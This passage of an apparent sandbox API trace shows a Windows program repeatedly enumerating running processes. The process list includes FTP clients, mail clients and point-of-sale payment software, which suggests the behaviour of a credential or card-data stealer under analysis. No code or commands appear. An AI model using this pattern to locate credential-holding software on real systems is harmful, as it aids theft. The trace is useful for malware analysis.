th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0201.020] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.022] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0201.024] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0201.026] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0201.028] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.029] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0201.031] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0201.033] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0201.034] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0201.045] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0201.047] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0201.050] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0201.052] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0201.071] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0201.073] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0201.074] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0201.114] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0201.116] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0201.118] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0201.122] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0201.126] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0201.131] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0201.134] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0201.135] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0201.137] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0201.139] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0201.140] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0201.142] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0201.144] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0201.146] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0201.149] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0201.151] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0201.153] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0201.158] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0201.160] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0201.162] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0201.164] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0201.167] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0201.168] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0201.171] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0201.174] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0201.176] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0201.178] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0201.181] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0201.183] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0201.186] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0201.188] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0201.190] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0201.195] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0201.197] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0201.199] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0201.201] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0201.204] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0201.206] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0201.209] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0201.212] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0201.216] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0201.219] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0201.222] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0201.224] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0201.227] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0201.236] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0201.239] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0201.240] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0201.242] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0201.244] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0201.246] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0201.248] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0201.250] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0201.253] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0201.255] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0201.259] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0201.262] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0201.264] Process32Next (in: hSnapshot=0x2088, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0201.267] CloseHandle (hObject=0x2088) returned 1 [0201.267] Sleep (dwMilliseconds=0x64) [0201.389] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20b8 [0201.405] Process32First (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.407] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0201.408] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0201.410] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0201.412] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0201.413] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0201.415] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0201.417] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0201.418] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0201.421] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, 